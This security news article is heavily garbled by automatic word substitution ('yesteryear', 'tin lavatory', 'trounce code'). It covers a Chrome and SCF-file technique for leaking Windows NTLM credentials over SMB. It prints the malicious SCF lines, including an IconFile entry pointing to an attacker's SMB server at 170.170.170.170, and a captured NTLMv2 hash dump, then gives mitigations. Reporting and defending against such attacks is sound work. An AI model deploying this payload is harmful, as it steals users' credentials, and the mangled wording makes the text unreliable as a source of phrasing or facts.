Researcher Bosko Stankovic of DefenseCode has industrial plant life that but yesteryear visiting a website containing a malicious SCF file could let victims to unknowingly part their computer's login credentials alongside hackers via Chrome in addition to the SMB protocol.
This technique is non novel in addition to was exploited yesteryear the Stuxnet — a powerful malware that particularly designed to destroy Iran's nuclear programme — that used the Windows shortcut LNK files to compromise systems.
What’s brand this gear upward on dissimilar from others is the fact that such SMB authentication related attacks cause got been outset fourth dimension demonstrated on Google Chrome publicly, after Internet Explorer (IE) in addition to Edge.
Chrome + SCF + SMB = Stealing Windows Credentials
SCF (Shell Command File) shortcut file format works similar every bit LNK files in addition to is designed to back upward a express gear upward of Windows Explorer commands that assist define an icon on your desktop, such every bit My Computer in addition to Recycle Bin.
"Currently, the aggressor but needs to entice the victim (using fully updated Google Chrome in addition to Windows) to see his website to last able to maintain in addition to reuse victim’s authentication credentials," Stankovic wrote inwards a weblog post, describing the flaw.Basically, shortcut links on your desktop are a text file alongside a specific syntax of trounce code that defines the place of icon/thumbnail, application's call in addition to it's location.
[Shell]Since Chrome trusts Windows SCF files, attackers tin lavatory play a joke on victims into visiting their website containing a maliciously crafted shortcut file, which gets downloaded automatically onto the target systems without prompting confirmation from the users.
Command=2
IconFile=explorer.exe,3
As presently every bit the user opens the folder containing that downloaded file, at ane time or later, this file automatically runs to recall an icon without the user having to click on it.
But instead of setting the place of an icon image, the malicious SCF file created yesteryear the aggressor incorporate the place of a remote SMB server (controlled yesteryear the attacker).
[Shell]So, every bit presently every bit the SCF file attempts to recall the icon image, it volition play a joke on into making an automatic authentication alongside the attacker’s controlled remote server over SMB protocol, handing over the victim's username in addition to hashed version of password, allowing the aggressor to role your credentials to authenticate to your personal figurer or network resource.
IconFile=\\170.170.170.170\icon
"Setting an icon place to a remote SMB server is a known gear upward on vector that abuses the Windows automatic authentication characteristic when accessing services similar remote file shares," Stankovic said.
But next the Stuxnet attacks, Microsoft forced LNK files to charge their icons only from local resources hence they'd no longer last vulnerable to such attacks which brand them charge malicious code from exterior servers.
However, SCF files were left alone.
Exploiting LM/NTLM Hash Authentication via SCF File
 |
| Image Source: SANS |
If yous are unaware, this is how authentication via the Server Message Block (SMB) protocol works inwards combination alongside the NTLM challenge/response authentication mechanism.
In short, LM/NTLM authentication works inwards four steps:
- Windows users (client) attempts to log into a server.
- The server responds alongside a challenge value, asking the user to encrypt the challenge value alongside his hash password in addition to shipping it back.
- Windows handles the SCF asking yesteryear sending the client’s username in addition to hashed version of the password to the server.
- The server in addition to then captures that reply in addition to approves authentication, if the client's hash password is correct.
If the user is business office of a corporate network, the network credentials assigned to the user yesteryear his company's sysadmin volition last sent to the attacker.
If the victim is a domicile user, the victim's Windows username in addition to password volition last sent to the attacker.
[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000
00000000000
Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000No doubt, the credentials are encrypted but tin lavatory last "brute-forced" afterwards to recall master login password inwards plainly text.
"It is worth mentioning that SCF files volition appear extensionless inwards Windows Explorer regardless of file in addition to folder settings," the researcher said. "Therefore, file named picture.jpg.scf volition appear inwards Windows Explorer every bit picture.jpg. This adds to inconspicuous nature of attacks using SCF files."
No Need to Decrypt Password *Sometimes*
Since a publish of Microsoft services cause got the password inwards its hashed form, the aggressor tin lavatory fifty-fifty role the encrypted password to login to your OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live in addition to other Microsoft services, making the decryption unnecessary.
Such vulnerabilities, according to the researcher, could likewise pose a serious threat to large organizations every bit they enable attackers to impersonate ane of their members, allowing attackers to at ane time reuse gained privileges to farther escalate access in addition to arrive at access in addition to command of their information technology resources in addition to perform attacks on other members.
How to Prevent Such SMB Authentication-related Attacks
Simply, block outbound SMB connections (TCP ports 139 in addition to 445) from the local network to the WAN via firewalls, hence that local computers tin lavatory non inquiry remote SMB servers.
Stankovic likewise advises users to see disabling automatic downloads inwards Google Chrome yesteryear going to Settings → Show advanced settings → in addition to and then Check the "Ask where to relieve each file earlier downloading" option.
This modify volition let yous to manually approve each download attempt, which would significantly decrease the opportunity of credential theft attacks using SCF files.
Google is aware of the vulnerability in addition to is said to last working on a patch, but no timeframe has been given every bit to when the piece volition last made available to the users.
